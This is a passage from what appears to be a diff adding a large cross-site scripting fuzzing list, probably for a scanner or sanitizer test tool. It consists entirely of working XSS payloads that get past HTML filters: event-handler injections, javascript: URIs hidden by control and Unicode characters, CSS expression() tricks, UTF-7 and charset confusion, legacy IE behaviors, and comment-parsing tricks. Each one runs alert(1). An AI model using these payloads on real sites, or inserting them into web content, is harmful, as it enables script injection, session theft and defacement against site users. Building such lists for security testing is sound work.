STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"> +<XSS STYLE="xss:expression(javascript:alert(1))"> +<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> 
+<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> +<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> +<BASE HREF="javascript:javascript:alert(1);//"> +<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT> +<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> +<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML> +<SCRIPT SRC="%(jpg)s"></SCRIPT> +<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- +<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X +<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> +<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> +<STYLE>@import'%(css)s';</STYLE> +<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> +<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> +<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> +<style onreadystatechange=javascript:javascript:alert(1);></style> +<?xml version="1.0"?><html:html 
xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> +<embed code=%(scriptlet)s></embed> +<embed code=javascript:javascript:alert(1);></embed> +<embed src=%(jscript)s></embed> +<frameset onload=javascript:javascript:alert(1)></frameset> +script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +</script><script>alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +<img src=1 href=1 onerror="javascript:alert(1)"></img> +<audio src=1 href=1 onerror="javascript:alert(1)"></audio> +<video src=1 href=1 onerror="javascript:alert(1)"></video> +<body src=1 href=1 onerror="javascript:alert(1)"></body> +<image src=1 href=1 onerror="javascript:alert(1)"></image> +<object src=1 href=1 onerror="javascript:alert(1)"></object> +<script src=1 href=1 onerror="javascript:alert(1)"></script> +<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> +<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> +<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> +<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> +<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> +<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> +<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> +<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html 
onMouseUp> +<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange> +<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> +<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide> +<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> +<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> +<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> +<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange> +<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> +<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> +<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> +<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange> +<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> +<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange> +<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus> +<applet onError applet onError="javascript:javascript:alert(1)"></applet onError> +<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> +<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> +<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> +<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> +<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> +<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> +<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee 
onScroll> +<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> +<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> +<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange> +<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> +<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> +<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> +<body onResize body onResize="javascript:javascript:alert(1)"></body onResize> +<object onError object onError="javascript:javascript:alert(1)"></object onError> +<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> +<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> +<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange> +<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> +<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> +<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror> +<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> +<body onunload body onunload="javascript:javascript:alert(1)"></body onunload> +<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> +<body onload body onload="javascript:javascript:alert(1)"></body onload> +<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> +<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> +<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload> +<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> +<body onkeydown body 
onkeydown="javascript:javascript:alert(1)"></body onkeydown> +<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> +<iframe src iframe src="javascript:javascript:alert(1)"></iframe src> +<svg onload svg onload="javascript:javascript:alert(1)"></svg onload> +<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> +<body onblur body onblur="javascript:javascript:alert(1)"></body onblur> +\x3Cscript>javascript:alert(1)</script> +'"`><script>/* *\x2Fjavascript:alert(1)// */</script> +<script>javascript:alert(1)</script\x0D +<script>javascript:alert(1)</script\x0A +<script>javascript:alert(1)</script\x0B +<script charset="\x22>javascript:alert(1)</script> +<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> --> +`"'><img src='#\x27 onerror=javascript:alert(1)> +<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a> +"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p> +<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a 
href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a> +<script>/* *\x2A/javascript:alert(1)// */</script> +<script>/* *\x00/javascript:alert(1)// */</script> +<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style> +"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF +"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF +<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script> +<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script> +<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> +"'`><\x00img src=xxx:x onerror=javascript:alert(1)> +<script src="data:text/plain\x2Cjavascript:alert(1)"></script> +<script src="data:\xD4\x8F,javascript:alert(1)"></script> +<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script> +<script src="data:\xCB\x8F,javascript:alert(1)"></script> +<script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> 
+<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF +ABC<div style="x:expression\x5C(javascript:alert(1)">DEF +ABC<div style="x:expression\x00(javascript:alert(1)">DEF +ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF +ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF +ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x09expression(javascript:alert(1)">DEF +ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF +ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF +ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF +ABC<div style="x:\x20expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF +ABC<div style="x:\x00expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF +ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF +<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a 
href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a 
href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> +<a 
href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> +`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> +`"'><img src=xxx:x \x22onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Donerror=javascript:alert(1)> +`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> +`"'><img src=xxx:x \x09onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Conerror=javascript:alert(1)> +`"'><img src=xxx:x \x00onerror=javascript:alert(1)> +`"'><img src=xxx:x \x27onerror=javascript:alert(1)> +`"'><img src=xxx:x \x20onerror=javascript:alert(1)> +"`'><script>\x3Bjavascript:alert(1)</script> +"`'><script>\x0Djavascript:alert(1)</script> +"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> +"`'><script>\xE2\x80\x81javascript:alert(1)</script> +"`'><script>\xE2\x80\x84javascript:alert(1)</script> +"`'><script>\xE3\x80\x80javascript:alert(1)</script> +"`'><script>\x09javascript:alert(1)</script> +"`'><script>\xE2\x80\x89javascript:alert(1)</script> +"`'><script>\xE2\x80\x85javascript:alert(1)</script> +"`'><script>\xE2\x80\x88javascript:alert(1)</script> +"`'><script>\x00javascript:alert(1)</script> +"`'><script>\xE2\x80\xA8javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> +"`'><script>\xE1\x9A\x80javascript:alert(1)</script> +"`'><script>\x0Cjavascript:alert(1)</script> +"`'><script>\x2Bjavascript:alert(1)</script> +"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> +"`'><script>-javascript:alert(1)</script> +"`'><script>\x0Ajavascript:alert(1)</script> +"`'><script>\xE2\x80\xAFjavascript:alert(1)</script> +"`'><script>\x7Ejavascript:alert(1)</script> +"`'><script>\xE2\x80\x87javascript:alert(1)</script> +"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> +"`'><script>\xE2\x80\xA9javascript:alert(1)</script> 
+"`'><script>\xC2\x85javascript:alert(1)</script> +"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x83javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> +"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x80javascript:alert(1)</script> +"`'><script>\x21javascript:alert(1)</script> +"`'><script>\xE2\x80\x82javascript:alert(1)</script> +"`'><script>\xE2\x80\x86javascript:alert(1)</script> +"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> +"`'><script>\x0Bjavascript:alert(1)</script> +"`'><script>\x20javascript:alert(1)</script> +"`'><script>\xC2\xA0javascript:alert(1)</script> +"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> +"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> +"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> +"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> +"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> +"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> +"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> +"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> +"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> +<script\x2F>javascript:alert(1)</script> +<script\x20>javascript:alert(1)</script> +<script\x0D>javascript:alert(1)</script> +<script\x0A>javascript:alert(1)</script> +<script\x0C>javascript:alert(1)</script> +<script\x00>javascript:alert(1)</script> +<script\x09>javascript:alert(1)</script> +`"'><img src=xxx:x onerror\x0B=javascript:alert(1)> +`"'><img src=xxx:x onerror\x00=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0C=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0D=javascript:alert(1)> +`"'><img src=xxx:x onerror\x20=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0A=javascript:alert(1)> +`"'><img src=xxx:x onerror\x09=javascript:alert(1)> +<script>javascript:alert(1)<\x00/script> +<img src=# onerror\x3D"javascript:alert(1)" > +<input onfocus=javascript:alert(1) autofocus> +<input 
onblur=javascript:alert(1) autofocus><input autofocus> +<video poster=javascript:javascript:alert(1)// +<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus> +<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X +<video><source onerror="javascript:javascript:alert(1)"> +<video onerror="javascript:javascript:alert(1)"><source> +<form><button formaction="javascript:javascript:alert(1)">X +<body oninput=javascript:alert(1)><input autofocus> +<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> +<frameset onload=javascript:alert(1)> +<table background="javascript:javascript:alert(1)"> +<!--<img src="--><img src=x onerror=javascript:alert(1)//"> +<comment><img src="</comment><img src=x onerror=javascript:alert(1))//"> +<![><img src="]><img src=x onerror=javascript:alert(1)//"> +<style><img src="</style><img src=x onerror=javascript:alert(1)//"> +<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div> +<head><base href="javascript://"></head><body><a href="/. 
/,javascript:alert(1)//#">XXX</a></body> +<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> +<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> +<object data="data:text/html;base64,%(base64)s"> +<embed src="data:text/html;base64,%(base64)s"> +<b <script>alert(1)</script>0 +<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> +<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'> +<embed src="javascript:alert(1)"> +<img src="javascript:alert(1)"> +<image src="javascript:alert(1)"> +<script src="javascript:alert(1)"> +<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x +<? foo="><script>javascript:alert(1)</script>"> +<! foo="><script>javascript:alert(1)</script>"> +</ foo="><script>javascript:alert(1)</script>"> +<? foo="><x foo='?><script>javascript:alert(1)</script>'>"> +<! 
foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>"> +<% foo><x foo="%><script>javascript:alert(1)</script>"> +<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script> +<img \x00src=x onerror="alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x11src=x onerror="javascript:alert(1)"> +<img \x12src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x10src=x onerror="javascript:alert(1)"> +<img\x13src=x onerror="javascript:alert(1)"> +<img\x32src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x11src=x onerror="javascript:alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x34src=x onerror="javascript:alert(1)"> +<img \x39src=x onerror="javascript:alert(1)"> +<img \x00src=x onerror="javascript:alert(1)"> +<img src\x09=x onerror="javascript:alert(1)"> +<img src\x10=x onerror="javascript:alert(1)"> +<img src\x13=x onerror="javascript:alert(1)"> +<img src\x32=x onerror="javascript:alert(1)"> +<img src\x12=x onerror="javascript:alert(1)"> +<img src\x11=x onerror="javascript:alert(1)"> +<img src\x00=x onerror="javascript:alert(1)"> +<img src\x47=x onerror="javascript:alert(1)"> +<img src=x\x09onerror="javascript:alert(1)"> +<img src=x\x10onerror="javascript:alert(1)"> +<img src=x\x11onerror="javascript:alert(1)"> +<img src=x\x12onerror="javascript:alert(1)"> +<img src=x\x13onerror="javascript:alert(1)"> +<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> +<img src=x onerror=\x09"javascript:alert(1)"> +<img src=x onerror=\x10"javascript:alert(1)"> +<img src=x onerror=\x11"javascript:alert(1)"> +<img src=x onerror=\x12"javascript:alert(1)"> +<img src=x onerror=\x32"javascript:alert(1)"> +<img src=x onerror=\x00"javascript:alert(1)"> +<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a> +<img src="x` `<script>javascript:alert(1)</script>"` `> +<img src onerror /" '"= 
alt=javascript:alert(1)//"> +<title onpropertychange=javascript:alert(1)></title><title title=> +<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> +<!--[if]><script>javascript:alert(1)</script --> +<!--[if<img src=x onerror=javascript:alert(1)//]> --> +<script src="/\%(jscript)s"></script> +<script src="\\%(jscript)s"></script> +<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> +<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X +<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> +<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d +<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> +<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> +<style>*[{}@import'%(css)s?]</style>X +<div style="font-family:'foo&#10;;color:red;';">XXX +<div style="font-family:foo}color=red;">XXX +<// style=x:expression\28javascript:alert(1)\29> +<style>*{x:expression(javascript:alert(1))}</style> +<div style=content:url(%(svg)s)></div> +<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X +<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> +<div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X +<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X +<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> +<x style="background:url('x&#1;;color:red;/*')">XXX</x> 
+<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> +<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> +<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> +<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> +<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi +<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> +<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾ +X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > +1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`> +1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;> +<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> +1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> +<a style="behavior:url(#default#AnchorClick);" 